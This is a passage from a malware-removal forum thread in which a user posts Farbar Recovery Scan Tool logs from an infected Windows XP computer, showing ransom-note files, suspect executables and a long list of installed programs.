    2010-09-17 23:30 - 2013-08-31 01:36 - 0001057 _____ () C:\Documents and Settings\RAUL_104\Application Data\vso_ts_preview.xml
    2015-01-27 20:15 - 2015-01-27 20:15 - 0000480 ____H () C:\Documents and Settings\RAUL_104\Application Data\麽鎒駓覜
    2011-01-26 16:37 - 2014-11-13 17:57 - 0038912 _____ () C:\Documents and Settings\RAUL_104\Local Settings\Application Data\DCBC2A71-70D8-4DAN-EHR8-E0D61DEA3FDF.ini
    2015-01-28 10:50 - 2015-01-28 10:50 - 0045601 _____ () C:\Documents and Settings\RAUL_104\Local Settings\Application Data\HELP_DECRYPT.PNG
    2015-01-28 10:50 - 2015-01-28 10:50 - 0000276 _____ () C:\Documents and Settings\RAUL_104\Local Settings\Application Data\HELP_DECRYPT.URL
    2012-04-27 13:38 - 2012-04-27 13:38 - 0000600 _____ () C:\Documents and Settings\RAUL_104\Local Settings\Application Data\PUTTY.RND
    2010-12-16 11:18 - 2010-12-16 11:18 - 0000000 _____ () C:\Documents and Settings\All Users\cmn_upld.log
    2011-01-07 14:36 - 2014-12-28 19:29 - 0144468 _____ () C:\Documents and Settings\All Users\dlea.log
    2014-11-19 17:09 - 2014-11-19 17:23 - 0000248 _____ () C:\Documents and Settings\All Users\dleaDiagnostics.log
    2010-12-20 22:02 - 2014-11-19 16:03 - 0048470 _____ () C:\Documents and Settings\All Users\dleaJSW.log
    2010-12-16 01:45 - 2015-03-28 19:19 - 0783804 _____ () C:\Documents and Settings\All Users\dleascan.log
    2010-12-16 11:30 - 2013-05-30 17:27 - 0000756 _____ () C:\Documents and Settings\All Users\FastPics.log
    2010-12-16 11:18 - 2010-12-16 11:18 - 0000000 _____ () C:\Documents and Settings\All Users\LxWbGwLog.log
    2015-01-25 10:44 - 2015-01-25 10:44 - 0241664 ____N () C:\Documents and Settings\All Users\qicswp.exe
    2010-12-16 01:31 - 2010-12-16 01:31 - 0000000 _____ () C:\Documents and Settings\All Users\UpdaterLog.txt

    Files to move or delete:
    ====================
    C:\Documents and Settings\All Users\qicswp.exe
    C:\Documents and Settings\AMY_106\hpothb07.dat
    C:\Documents and Settings\RAUL_104\msndata.dat
    C:\Documents and Settings\RAUL_104\SIMRecoveryPro.exe


    Some content of TEMP:
    ====================


    ==================== Bamital & volsnap Check =================

    (There is no automatic fix for files that do not pass verification.)

    C:\WINDOWS\explorer.exe => MD5 is legit
    C:\WINDOWS\system32\winlogon.exe => MD5 is legit
    C:\WINDOWS\system32\svchost.exe => MD5 is legit
    C:\WINDOWS\system32\services.exe => MD5 is legit
    C:\WINDOWS\system32\User32.dll => MD5 is legit
    C:\WINDOWS\system32\userinit.exe => MD5 is legit
    C:\WINDOWS\system32\rpcss.dll => MD5 is legit
    C:\WINDOWS\system32\Drivers\volsnap.sys => MD5 is legit

    ==================== End Of Log ============================
     
  10. chron104

    chron104 Thread Starter

    Joined:
    Mar 27, 2015
    Messages:
    63
    These are the results of the ADDITION.TXT listed below....

    Additional scan result of Farbar Recovery Scan Tool (x86) Version: 11-03-2015
    Ran by RAUL_104 at 2015-03-28 19:58:55
    Running from C:\Documents and Settings\RAUL_104\My Documents\Downloads
    Boot Mode: Normal
    ==========================================================


    ==================== Security Center ========================

    (If an entry is included in the fixlist, it will be removed.)

    AV: AVG update module (Enabled - Up to date) {17DDD097-36FF-435F-9E1B-52D74245D6BF}
    AV: McAfee Anti-Virus and Anti-Spyware (Enabled - Up to date) {84B5EE75-6421-4CDE-A33A-DD43BA9FAD83}
    FW: McAfee Firewall (Disabled) {94894B63-8C7F-4050-BDA4-813CA00DA3E8}

    ==================== Installed Programs ======================

    (Only the adware programs with "hidden" flag could be added to the fixlist to unhide them. The adware programs should be uninstalled manually.)

    "Nero SoundTrax Help (Version: 4.0.15.0 - Nero AG) Hidden
    3ivx MPEG-4 5.0.3 (remove only) (HKLM\...\3ivx MPEG-4 5.0.3) (Version: 5.0.3 - 3ivx Technologies, Pty. Ltd.)
    ABBYY FineReader 11 Corporate Edition (HKLM\...\{F1100000-0010-0000-0000-074957833700}) (Version: 11.0.460 - ABBYY)
    Acrobat.com (HKLM\...\{287ECFA4-719A-2143-A09B-D6A12DE54E40}) (Version: 1.6.65 - Adobe Systems Incorporated)
    Adobe AIR (HKLM\...\Adobe AIR) (Version: 1.5.0.7220 - Adobe Systems Inc.)
    Adobe Flash Player 16 ActiveX (HKLM\...\Adobe Flash Player ActiveX) (Version: 16.0.0.305 - Adobe Systems Incorporated)
    Adobe Flash Player 17 NPAPI (HKLM\...\Adobe Flash Player NPAPI) (Version: 17.0.0.134 - Adobe Systems Incorporated)
    Adobe Reader 9.5.3 (HKLM\...\{AC76BA86-7AD7-1033-7B44-A95000000001}) (Version: 9.5.3 - Adobe Systems Incorporated)
    Advertising Center (Version: 0.0.0.2 - Nero AG) Hidden
    AIM 7 (HKLM\...\AIM_7) (Version: - )
    AnyDVD (HKLM\...\AnyDVD) (Version: - SlySoft)
    Apple Application Support (HKLM\...\{CCE825DB-347A-4004-A186-5F4A6FDD8547}) (Version: 2.3.2 - Apple Inc.)
    Apple Mobile Device Support (HKLM\...\{459699C3-9430-4381-964B-4248D87B49F9}) (Version: 6.0.1.3 - Apple Inc.)
    Apple Software Update (HKLM\...\{789A5B64-9DD9-4BA5-915A-F0FC0A1B7BFE}) (Version: 2.1.3.127 - Apple Inc.)
    ArcSoft MediaImpression 2 (HKLM\...\{210E8562-74DA-4D97-945B-88B2ED9C8028}) (Version: 2.0.15.1073 - ArcSoft)
    ATI AVIVO Codecs (Version: 10.0.0.40103 - ATI Technologies Inc.) Hidden
    ATI Catalyst Install Manager (HKLM\...\{D1AA5A83-E983-0C1B-658F-2B79427B0608}) (Version: 3.0.778.0 - ATI Technologies, Inc.)
    Audacity 1.2.6 (HKLM\...\Audacity_is1) (Version: - )
    AVG 2015 (HKLM\...\AVG) (Version: 2015.0.5751 - AVG Technologies)
    AVG 2015 (Version: 15.0.4306 - AVG Technologies) Hidden
    AVG 2015 (Version: 15.0.5751 - AVG Technologies) Hidden
    AviSynth 2.5 (HKLM\...\AviSynth) (Version: - )
    BearShare (HKLM\...\BearShare) (Version: - Musiclab, LLC)
    BitTorrent (HKLM\...\BitTorrent) (Version: 7.6.1 - BitTorrent Inc.)
    BitZipper 5.1 (HKLM\...\BitZipper_is1) (Version: - Bitberry Software)
    Bonjour (HKLM\...\{79155F2B-9895-49D7-8612-D92580E0DE5B}) (Version: 3.0.0.10 - Apple Inc.)
    calibre (HKLM\...\{4BE3B1FB-31C9-4FA4-B7FE-37025785FCE9}) (Version: 0.7.42 - Kovid Goyal)
    ccc-core-static (Version: 2010.0527.1242.20909 - ATI) Hidden
    CCleaner (HKLM\...\CCleaner) (Version: 2.27 - Piriform)
    CloneDVD2 (HKLM\...\CloneDVD2) (Version: - Elaborate Bytes)
    CloneDVDmobile (HKLM\...\CloneDVDmobile) (Version: 1.7.0.0 - SlySoft)
    Collectorz.com Movie Collector (HKLM\...\Collectorz.com Movie Collector) (Version: - )
    Compact Wireless-G USB Adapter (HKLM\...\{F855C3AE-992D-4B84-A09D-07103CDCDAC2}) (Version: - )
    Conexant D850 56K V.9x DFVc Modem (HKLM\...\CNXT_MODEM_PCI_VEN_14F1&DEV_2F20&SUBSYS_200F14F1) (Version: - )
    ConvertXtoDVD 4.1.1.334 (HKLM\...\{DB6AB705-C9BD-40E3-8929-2EA57F36A4FF}_is1) (Version: 4.1.1.334 - )
    Crash Analysis Tool (HKLM\...\{D5F881C2-B134-474E-AA60-B25DD218AE0D}) (Version: 1.00.0001 - Dell)
    Creative MediaSource (HKLM\...\{56F3E1FF-54FE-4384-A153-6CCABA097814}) (Version: - )
    CutePDF Writer 2.8 (HKLM\...\CutePDF Writer Installation) (Version: - )
    Data Lifeguard Diagnostic for Windows (HKLM\...\{75B61CF0-B8A8-46E2-8709-C4A79898AC1D}) (Version: 1.17 - Western Digital Corporation)
    Dell Digital Jukebox Driver (HKLM\...\Dell Digital Jukebox Driver) (Version: - )
    Dell Driver Download Manager (HKU\S-1-5-21-515967899-117609710-839522115-1004\...\309a46b1dc89b774) (Version: 1.1.0.0 - Dell Inc.)
    Dell Media Experience (HKLM\...\{2637C347-9DAD-11D6-9EA2-00055D0CA761}) (Version: - )
    Dell ResourceCD (HKLM\...\{D78653C3-A8FF-415F-92E6-D774E634FF2D}) (Version: - )
    Dell Support (HKLM\...\{43FCA273-9534-40DB-B7C5-D7758875616A}) (Version: 2.1.1.0 - Dell)
    Dell System Detect (HKU\S-1-5-21-515967899-117609710-839522115-1004\...\9204f5692a8faf3b) (Version: 5.6.0.4 - Dell)
    Dell Toolbar (HKLM\...\{09B71986-2AC5-482d-B6CB-42EA34F4F85B}) (Version: 1.8.12.0 - )
    Dell V310-V510 Series (HKLM\...\Dell V310-V510 Series) (Version: - Dell, Inc.)
    DIGOpt (Version: 9.0.0917.2 - Your Company Name) Hidden
    DivX Converter (HKLM\...\{B13A7C41581B411290FBC0395694E2A9}) (Version: 7.1.0 - DivX, Inc.)
    DivX Plus DirectShow Filters (HKLM\...\DivX Plus DirectShow Filters) (Version: - DivX, Inc.)
    DivX Setup (HKLM\...\DivX Setup) (Version: 2.6.1.9 - DivX, LLC)
    DolbyFiles (Version: 2.0 - Nero AG) Hidden
    Download Updater (AOL LLC) (HKLM\...\SoftwareUpdUtility) (Version: - ) <==== ATTENTION
    DVD Decrypter (Remove Only) (HKLM\...\DVD Decrypter) (Version: - )
    EZ Tape Converter 2.0.0 by MixMeister (HKLM\...\EZ Tape Converter by MixMeister_is1) (Version: - MixMeister Technology LLC)
    EZ Vinyl/Tape Converter 4.1 by MixMeister (HKLM\...\EZ Vinyl/Tape Converter by MixMeister_is1) (Version: - MixMeister Technology LLC)
    ffdshow [rev 2583] [2009-01-05] (HKLM\...\ffdshow_is1) (Version: 1.0 - )
    FileZilla Client 3.8.0 (HKU\S-1-5-21-515967899-117609710-839522115-1004\...\FileZilla Client) (Version: 3.8.0 - Tim Kosse)
    FlipShare (HKLM\...\{B1C0D829-FE30-059E-E93F-CDC7A48235C0}) (Version: 5.6.35.0 - Flip Video)
    FreeOCR v5.0 (HKLM\...\freeocr_is1) (Version: - )
    FrostWire 4.21.3 (HKLM\...\FrostWire) (Version: 4.21.3.0 - FrostWire Team)
    FrostWire 5.3.7 (HKLM\...\FrostWire 5) (Version: 5.3.7.0 - FrostWire Team)
    Genetec Omnicast WebClient 4.5 (HKLM\...\{9E930895-D4B9-4424-88F6-B57220DE45DA}) (Version: 4.5.1475.47 - Genetec Inc)
    Google Chrome (HKU\S-1-5-21-515967899-117609710-839522115-1004\...\Google Chrome) (Version: 41.0.2272.101 - Google Inc.)
    Google Toolbar for Internet Explorer (HKLM\...\{2318C2B1-4965-11d4-9B18-009027A5CD4F}) (Version: 7.5.6227.252 - Google Inc.)
    Google Toolbar for Internet Explorer (Version: 1.0.0 - Google Inc.) Hidden
    Google Update Helper (Version: 1.3.25.11 - Google Inc.) Hidden
    Google Update Helper (Version: 1.3.26.9 - Google Inc.) Hidden
    Greeting Card Creator 32 (HKLM\...\Greeting Card Creator 32) (Version: - )
    Haali Media Splitter (HKLM\...\HaaliMkx) (Version: - )
    Harmony Browser Plug-in (HKLM\...\{634F79E1-2A41-4C40-9E8D-89EC740AC9D6}) (Version: 2.0 - Logitech)
    HP Memories Disc (HKLM\...\{B376402D-58EA-45EA-BD50-DD924EB67A70}) (Version: 1.0.4.805 - Hewlett-Packard Company)
    HP Photo and Imaging 2.2 - Scanjet 3970 Series (HKLM\...\{796ADAFF-7C5B-4CED-BA11-55A3644F1E0D}) (Version: 2.2.0000 - {&Tahoma8}Hewlett-Packard)
    ImagXpress (Version: 7.0.74.0 - Nero AG) Hidden
    ImgBurn (HKLM\...\ImgBurn) (Version: 2.4.1.0 - LIGHTNING UK!)
    IMM4 VCM Codec 1.0.0.10 (HKLM\...\IMM4 Codec_is1) (Version: - )
    Intel(R) PRO Network Connections Drivers (HKLM\...\PROSet) (Version: - )
    Internet Explorer (Enable DEP) (HKLM\...\{a9264802-8a7a-40fe-a135-5c6d204aed7a}.sdb) (Version: - )
    iolo technologies' System Mechanic (HKLM\...\{55FD1D5A-7AEF-4DA3-8FAF-A71B2A52FFC7}_is1) (Version: 14.0.1 - iolo technologies, LLC)
    iSyncTunes (HKLM\...\iSyncTunes) (Version: 1.6.0.0 - isynctunes.com)
    iTunes (HKLM\...\{1B6C0E95-182C-48E0-9C4B-4F916308249C}) (Version: 11.0.0.163 - Apple Inc.)
    Java 7 Update 25 (HKLM\...\{26A24AE4-039D-4CA4-87B4-2F83217025FF}) (Version: 7.0.250 - Oracle)
    Jawbone Updater (HKLM\...\Jawbone Updater) (Version: 0.1 - Jawbone)
    LimeWire 5.1.2 (HKLM\...\LimeWire) (Version: 5.1.2 - Lime Wire, LLC)
    LiveReg (Symantec Corporation) (HKLM\...\LiveReg) (Version: 2.4.1.2056 - Symantec Corporation)
    LiveUpdate 1.90 (Symantec Corporation) (HKLM\...\LiveUpdate) (Version: 1.90.15.0 - Symantec Corporation)
    Logitech Desktop Messenger (HKLM\...\{900B1197-53F5-4F46-A882-2CFFFE2EEDCB}) (Version: 2.52.18 - Logitech, Inc.)
    Logitech Harmony Remote Software 7 (HKLM\...\{5C6F884D-680C-448B-B4C9-22296EE1B206}) (Version: 7.7.0.0 - Logitech)
    Logitech Vid HD (HKLM\...\Logitech Vid) (Version: 7.2 (7240) - Logitech Inc..)
    Logitech Webcam Software (HKLM\...\{C27BC2A2-30DD-4014-B22E-63EB0DB572F9}) (Version: 12.10.1113 - Logitech Inc.)
    Logitech Webcam Software Driver Package (HKLM\...\lvdrivers_12.10) (Version: 12.10.1110 - Logitech Inc.)
    Malwarebytes Anti-Malware version 2.0.4.1028 (HKLM\...\Malwarebytes Anti-Malware_is1) (Version: 2.0.4.1028 - Malwarebytes Corporation)
    McAfee AntiVirus Plus (HKLM\...\MSC) (Version: 12.8.992 - McAfee, Inc.)
    McAfee Virtual Technician (HKLM\...\{8F1A20DC-251D-47B0-91B7-DCA2523EE6C9}) (Version: 5.5.2.0 - McAfee, Inc.)
    McAfee Virtual Technician (HKLM\...\McAfee Virtual Technician) (Version: 7.6.0.202 - McAfee, Inc.)
    Menu Templates - Starter Kit (Version: 9.4.6.0 - Nero AG) Hidden
    Microsoft .NET Framework 1.1 (HKLM\...\Microsoft .NET Framework 1.1 (1033)) (Version: - )
    Microsoft .NET Framework 1.1 Security Update (KB2698023) (HKLM\...\M2698023) (Version: - )
    Microsoft .NET Framework 1.1 Security Update (KB2833941) (HKLM\...\M2833941) (Version: - )
    Microsoft .NET Framework 1.1 Security Update (KB979906) (HKLM\...\M979906) (Version: - )
    Microsoft .NET Framework 2.0 Service Pack 2 (HKLM\...\{C09FB3CD-3D0C-3F2D-899A-6A1D67F2073F}) (Version: 2.2.30729 - Microsoft Corporation)
    Microsoft .NET Framework 3.0 Service Pack 2 (HKLM\...\{A3051CD0-2F64-3813-A88D-B8DCCDE8F8C7}) (Version: 3.2.30729 - Microsoft Corporation)
    Microsoft .NET Framework 3.5 SP1 (HKLM\...\Microsoft .NET Framework 3.5 SP1) (Version: - Microsoft Corporation)
    Microsoft .NET Framework 4 Client Profile (HKLM\...\Microsoft .NET Framework 4 Client Profile) (Version: 4.0.30319 - Microsoft Corporation)
    Microsoft .NET Framework 4 Extended (HKLM\...\Microsoft .NET Framework 4 Extended) (Version: 4.0.30319 - Microsoft Corporation)
    Microsoft Automated Troubleshooting Services Shim (HKLM\...\{c9920352-04e6-469d-bab8-e2b9c7c75415}.sdb) (Version: - )
    Microsoft Compression Client Pack 1.0 for Windows XP (HKLM\...\MSCompPackV1) (Version: 1 - Microsoft Corporation)
    Microsoft Easy Assist v2 (HKLM\...\{326957C7-83FD-4550-A59A-849B7B4297DE}) (Version: 8.1.6416.0 - Microsoft Corporation)
    Microsoft Fix it Center (HKLM\...\{B7588D45-AFDC-4C93-9E2E-A100F3554B64}) (Version: 1.0.0100 - Microsoft Corporation)
    Microsoft IntelliPoint 7.0 (HKLM\...\{EF71A531-5B6C-4B20-8D1E-E6379C7FB6D3}) (Version: 7.0.260.0 - Microsoft)
    Microsoft Office 2007 Service Pack 3 (SP3) (HKLM\...\{91120000-002F-0000-0000-0000000FF1CE}_HOMESTUDENTR_{6E107EB7-8B55-48BF-ACCB-199F86A2CD93}) (Version: - Microsoft)
    Microsoft Office File Validation Add-In (HKLM\...\{90140000-2005-0000-0000-0000000FF1CE}) (Version: 14.0.5130.5003 - Microsoft Corporation)
    Microsoft Office Home and Student 2007 (HKLM\...\HOMESTUDENTR) (Version: 12.0.6612.1000 - Microsoft Corporation)
    Microsoft Silverlight (HKLM\...\{89F4137D-6C26-4A84-BDB8-2E5A4BB71E00}) (Version: 5.1.30514.0 - Microsoft Corporation)
    Microsoft User-Mode Driver Framework Feature Pack 1.0 (HKLM\...\Wudf01000) (Version: - Microsoft Corporation)
    Microsoft Visual C++ 2005 Redistributable (HKLM\...\{710f4c1c-cc18-4c49-8cbf-51240c89a1a2}) (Version: 8.0.61001 - Microsoft Corporation)
    Microsoft Visual C++ 2005 Redistributable (HKLM\...\{7299052b-02a4-4627-81f2-1818da5d550d}) (Version: 8.0.56336 - Microsoft Corporation)
    Microsoft Visual C++ 2005 Redistributable (HKLM\...\{837b34e3-7c30-493c-8f6a-2b0f04e2912c}) (Version: 8.0.59193 - Microsoft Corporation)
    Microsoft Visual C++ 2008 Redistributable - KB2467174 - x86 9.0.30729.5570 (HKLM\...\{86CE85E6-DBAC-3FFD-B977-E4B79F83C909}) (Version: 9.0.30729.5570 - Microsoft Corporation)
    Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.4148 (HKLM\...\{1F1C2DFC-2D24-3E06-BCB8-725134ADF989}) (Version: 9.0.30729.4148 - Microsoft Corporation)
    Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.6161 (HKLM\...\{9BE518E6-ECC6-35A9-88E4-87755C07200F}) (Version: 9.0.30729.6161 - Microsoft Corporation)
    Microsoft Visual C++ 2010 x86 Redistributable - 10.0.40219 (HKLM\...\{F0C3E5D1-1ADE-321E-8167-68EF0DE699A5}) (Version: 10.0.40219 - Microsoft Corporation)
    Microsoft WinUsb 1.0 (HKLM\...\winusb0100) (Version: - Microsoft Corporation)
    MobileMe Control Panel (HKLM\...\{A71D5E81-B967-43DB-93D7-FD31BFB95748}) (Version: 3.1.5.0 - Apple Inc.)
    MotoHelper 2.0.51 Driver 5.1.0 (HKLM\...\MotoHelper) (Version: 2.0.51 - Motorola)
    MotoHelper MergeModules (Version: 1.2.0 - Motorola) Hidden
    Motorola Mobile Drivers Installation 5.1.0 (Version: 5.1.0 - Motorola Inc.) Hidden
    Move Media Player (HKU\S-1-5-21-515967899-117609710-839522115-1004\...\Move Media Player) (Version: - Move Networks)
    Movie DVD Maker 2.7.0827 (HKLM\...\Movie DVD Maker_is1) (Version: - Aone Software)
    Movie Templates - Starter Kit (Version: 9.4.6.0 - Nero AG) Hidden
    Mozilla Firefox 36.0.4 (x86 en-US) (HKLM\...\Mozilla Firefox 36.0.4 (x86 en-US)) (Version: 36.0.4 - Mozilla)
    Mozilla Maintenance Service (HKLM\...\MozillaMaintenanceService) (Version: 29.0.1 - Mozilla)
    MSN (HKLM\...\MSNINST) (Version: 10.50.0679.0 - Microsoft Corporation)
    MSN Messenger 7.0 (HKLM\...\{ABEB838C-A1A7-4C5D-B7E1-8B4314600820}) (Version: 7.0.0820 - Microsoft Corporation)
    MSRedist (Version: 1.0.0.0 - Symantec Corporation) Hidden
    MSXML 4.0 SP2 (KB954430) (HKLM\...\{86493ADD-824D-4B8E-BD72-8C5DCDC52A71}) (Version: 4.20.9870.0 - Microsoft Corporation)
    MSXML 4.0 SP2 (KB973688) (HKLM\...\{F662A8E6-F4DC-41A2-901E-8C11F044BDEC}) (Version: 4.20.9876.0 - Microsoft Corporation)
    MSXML 6.0 Parser (HKLM\...\{A43BF6A5-D5F0-4AAA-BF41-65995063EC44}) (Version: 6.10.1129.0 - Microsoft Corporation)
    MUSICMATCH® Jukebox (HKLM\...\{45EBDA59-D33B-433A-956E-B2F236468B56}) (Version: - )
    My Dell (HKLM\...\PC-Doctor for Windows) (Version: 3.5.6426.22 - PC-Doctor, Inc.)
    Nero 9 (HKLM\...\{88f5c91c-7766-4bfb-9039-6edd0ff28c10}) (Version: - Nero AG)
    Nero BackItUp 4 (HKLM\...\{73bb6d85-80a3-43e2-a2e6-3d43d2a1b22b}) (Version: - Nero AG)
    PMB (HKLM\...\{B6A98E5F-D6A7-46FB-9E9D-1F7BF443491C}) (Version: 5.3.00.06040 - Sony Corporation)
    PowerDVD (HKLM\...\{6811CAA0-BF12-11D4-9EA1-0050BAE317E1}) (Version: 7.0 - Dell)
    PSP Video 9 4.07 (HKLM\...\PSP Video 9) (Version: 4.07 - Red Kawa)
    QuickTime (HKLM\...\{AF0CE7C0-A3E4-4D73-988B-B29187EC6E9A}) (Version: 7.73.80.64 - Apple Inc.)
    Remote Control USB Driver (HKLM\...\{8471021C-F529-43DE-84DF-3612E10F58C4}) (Version: 2.3.2.317 - )
    ResumeMaker Professional (HKLM\...\ResumeMaker Professional) (Version: 14 - Individual Software, Inc)
    Safari (HKLM\...\{FA4C2D53-205F-4245-9717-F3761154824D}) (Version: 5.34.57.2 - Apple Inc.)
    Samsung Kies (HKLM\...\InstallShield_{758C8301-2696-4855-AF45-534B1200980A}) (Version: 2.5.0.12094_28 - Samsung Electronics Co., Ltd.)
    Samsung Kies (Version: 2.5.0.12094_28 - Samsung Electronics Co., Ltd.) Hidden
    Samsung Mobile phone USB driver Software (HKLM\...\Samsung Mobile phone USB driver) (Version: - )
    SAMSUNG PC Share Manager (HKLM\...\{7F6EB1C8-7492-40F4-A006-3B4863BCF018}) (Version: 1.00.000 - )
    Samsung PC Studio 3 (HKLM\...\{C4A4722E-79F9-417C-BD72-8D359A090C97}) (Version: 3.2.3.90502 - Samsung Electronics Co., Ltd.)
    Samsung PC Studio 3 (Version: 3.0.0.81001 - Samsung Electronics Co., Ltd.) Hidden
    SAMSUNG USB Driver for Mobile Phones (HKLM\...\{D0795B21-0CDA-4a92-AB9E-6E92D8111E44}) (Version: 1.5.23.0 - SAMSUNG Electronics Co., Ltd.)
    Shared C Run-time for x86 (Version: 10.0.0 - McAfee) Hidden
    ShareIns (Version: 1.00.0000 - Hewlett-Packard) Hidden
    Sharepod 4.0.1.0 (HKLM\...\{085BCFB8-F6FB-4600-AFAB-1F6DBC7F5F99}_is1) (Version: - Macroplant LLC)
    SIM Recovery Pro v1.2.2 (HKLM\...\ST6UNST #1) (Version: - )
    SiteAdvisor (HKLM\...\{35ED3F83-4BDC-4c44-8EC6-6A8301C7413A}) (Version: 3.7.199 - McAfee, Inc.)
    Skins (Version: 2010.0527.1242.20909 - ATI) Hidden
    Skype Click to Call (HKLM\...\{B6CF2967-C81E-40C0-9815-C05774FEF120}) (Version: 6.13.13771 - Skype Technologies S.A.)
    Skype™ 6.5 (HKLM\...\{4E76FF7E-AEBA-4C87-B788-CD47E5425B9D}) (Version: 6.5.158 - Skype Technologies S.A.)
    Sony Image Data Suite (HKLM\...\{359FCAA7-B544-4147-AE3B-8C8A526E2427}) (Version: 3.2.00.19080 - Sony Corporation)
    Sound Blaster Audigy 2 (HKLM\...\{E82BF103-904F-49C0-B77F-6EC110B71E87}) (Version: - )
    SoundTrax (Version: 4.4.37.1 - Nero AG) Hidden
    TeamViewer 7 (HKLM\...\TeamViewer 7) (Version: 7.0.12979 - TeamViewer)
    Update for 2007 Microsoft Office System (KB967642) (HKLM\...\{91120000-002F-0000-0000-0000000FF1CE}_HOMESTUDENTR_{C444285D-5E4F-48A4-91DD-47AAAA68E92D}) (Version: - Microsoft)
    VC80CRTRedist - 8.0.50727.6195 (Version: 1.2.0 - DivX, Inc) Hidden
    Viewpoint Media Player (HKLM\...\ViewpointMediaPlayer) (Version: - )
    Visual Studio 2012 x86 Redistributables (HKLM\...\{98EFF19A-30AB-4E4B-B943-F06B1C63EBF8}) (Version: 14.0.0.1 - AVG Technologies CZ, s.r.o.)
    VSO CopyToDVD 4 (HKLM\...\{870F1750-BA89-11DA-A94D-0800200C9A66}_is1) (Version: 4.3.1.11 - VSO Software)
    WD Anywhere Backup (HKLM\...\{68131B0A-D78D-4aed-B74E-33A6C7324E50}) (Version: - Memeo Inc.)
    WD Backup (HKLM\...\{A351224F-533A-4EED-89F4-0BF3417FD31D}) (Version: - ArcSoft)
    WD Diagnostics (HKLM\...\{0AB76F69-E761-4CFA-B9B0-A1906B4E9E4B}) (Version: 1.07.0000 - Western Digital Technologies)
    WD Drive Manager (x86) (HKLM\...\{1C504B59-FFBF-4A65-9E0E-FE06159CAB9B}) (Version: 2.113 - Western Digital)
    WD Firewire HID Driver (HKLM\...\{FD6C6B7F-5696-48C5-A601-2EE9E50C3D46}) (Version: 1.04.0001 - Western Digital Technologies)
    WebFldrs XP (Version: 9.50.7523 - Microsoft Corporation) Hidden
    Windows 7 Upgrade Advisor (HKLM\...\{AB05F2C8-F608-403b-95E1-FD8ADFACD31E}) (Version: 2.0.5000.0 - Microsoft Corporation)
    Windows Defender (HKLM\...\{A06275F4-324B-4E85-95E6-87B2CD729401}) (Version: 1.1.1593.21 - Microsoft Corporation)
    Windows Feature Pack for Storage (32-bit) - IMAPI update for Blu-Ray (HKLM\...\KB952011) (Version: 1.0 - Microsoft Corporation)
    Windows Internet Explorer 8 (HKLM\...\ie8) (Version: 20090308.140743 - Microsoft Corporation)
    Windows Media Format 11 runtime (HKLM\...\Windows Media Format Runtime) (Version: - )
    Windows Media Player 11 (HKLM\...\Windows Media Player) (Version: - )
    Windows PowerShell(TM) 1.0 (HKLM\...\KB926139-v2) (Version: 2 - Microsoft Corporation)
    Windows XP Service Pack 3 (HKLM\...\Windows XP Service Pack) (Version: 20080414.031525 - Microsoft Corporation)
    WinZip 12.1 (HKLM\...\{CD95F661-A5C4-44F5-A6AA-ECDD91C240B8}) (Version: 12.1.8497 - WinZip Computing, S.L. )
    YouTube Downloader App 1.02 (HKLM\...\YouTube Downloader App) (Version: 1.02 - Regensoft)

    ==================== Custom CLSID (selected items): ==========================

    (If an entry is included in the fixlist, it will be removed from registry. Any eventual file will not be moved.)

    CustomCLSID: HKU\S-1-5-21-515967899-117609710-839522115-1004_Classes\CLSID\{022105BD-948A-40C9-AB42-A3300DDF097F}\localserver32 -> C:\Documents and Settings\RAUL_104\Local Settings\Application Data\Google\Update\GoogleUpdate.exe (Google Inc.)
    CustomCLSID: HKU\S-1-5-21-515967899-117609710-839522115-1004_Classes\CLSID\{1E72F5F2-7DB2-54A7-56F3-81C6B242D95C}\InprocServer32 -> C:\WINDOWS\system32\ole32.dll (Microsoft Corporation)
    CustomCLSID: HKU\S-1-5-21-515967899-117609710-839522115-1004_Classes\CLSID\{22181302-A8A6-4F84-A541-E5CBFC70CC43}\localserver32 -> C:\Documents and Settings\RAUL_104\Local Settings\Application Data\Google\Update\1.3.26.9\GoogleUpdateOnDemand.exe (Google Inc.)
    CustomCLSID: HKU\S-1-5-21-515967899-117609710-839522115-1004_Classes\CLSID\{2F0E2680-9FF5-43C0-B76E-114A56E93598}\localserver32 -> C:\Documents and Settings\RAUL_104\Local Settings\Application Data\Google\Update\1.3.26.9\GoogleUpdateOnDemand.exe (Google Inc.)
    CustomCLSID: HKU\S-1-5-21-515967899-117609710-839522115-1004_Classes\CLSID\{5139B445-06CA-4A3F-82F8-030D9F8A1F31}\InprocServer32 -> C:\Documents and Settings\All Users\Application Data\{F8BED27D-15C8-466B-8E3D-1F636A464659}\ddrawex. (the data entry has 11 more characters).
    CustomCLSID: HKU\S-1-5-21-515967899-117609710-839522115-1004_Classes\CLSID\{51F9E8EF-59D7-475B-A106-C7EA6F30C119}\localserver32 -> C:\Documents and Settings\RAUL_104\Local Settings\Application Data\Google\Update\1.3.26.9\GoogleUpdateOnDemand.exe (Google Inc.)
    CustomCLSID: HKU\S-1-5-21-515967899-117609710-839522115-1004_Classes\CLSID\{5C65F4B0-3651-4514-B207-D10CB699B14B}\localserver32 -> C:\Documents and Settings\RAUL_104\Local Settings\Application Data\Google\Chrome\Application\41.0.2272.101\delegate_execute.exe (Google Inc.)
    CustomCLSID: HKU\S-1-5-21-515967899-117609710-839522115-1004_Classes\CLSID\{7ECD0E2C-3F8E-6CCD-2BAA-51F5C421AA14}\InprocServer32 -> C:\WINDOWS\system32\ole32.dll (Microsoft Corporation)
    CustomCLSID: HKU\S-1-5-21-515967899-117609710-839522115-1004_Classes\CLSID\{C3101A8B-0EE1-4612-BFE9-41FFC1A3C19D}\InprocServer32 -> C:\Documents and Settings\RAUL_104\Local Settings\Application Data\Google\Update\1.3.26.9\npGoogleUpdate3.dll (Google Inc.)
    CustomCLSID: HKU\S-1-5-21-515967899-117609710-839522115-1004_Classes\CLSID\{C3BC25C0-FCD3-4F01-AFDD-41373F017C9A}\InprocServer32 -> C:\Documents and Settings\RAUL_104\Local Settings\Application Data\Google\Update\1.3.26.9\psuser.dll (Google Inc.)
    CustomCLSID: HKU\S-1-5-21-515967899-117609710-839522115-1004_Classes\CLSID\{C442AC41-9200-4770-8CC0-7CDB4F245C55}\InprocServer32 -> C:\Documents and Settings\RAUL_104\Local Settings\Application Data\Google\Update\1.3.26.9\npGoogleUpdate3.dll (Google Inc.)
    CustomCLSID: HKU\S-1-5-21-515967899-117609710-839522115-1004_Classes\CLSID\{D0336C0B-7919-4C04-8CCE-2EBAE2ECE8C9}\InprocServer32 -> C:\Documents and Settings\RAUL_104\Local Settings\Application Data\Google\Update\1.3.25.11\psuser.dl (the data entry has 9 more characters).
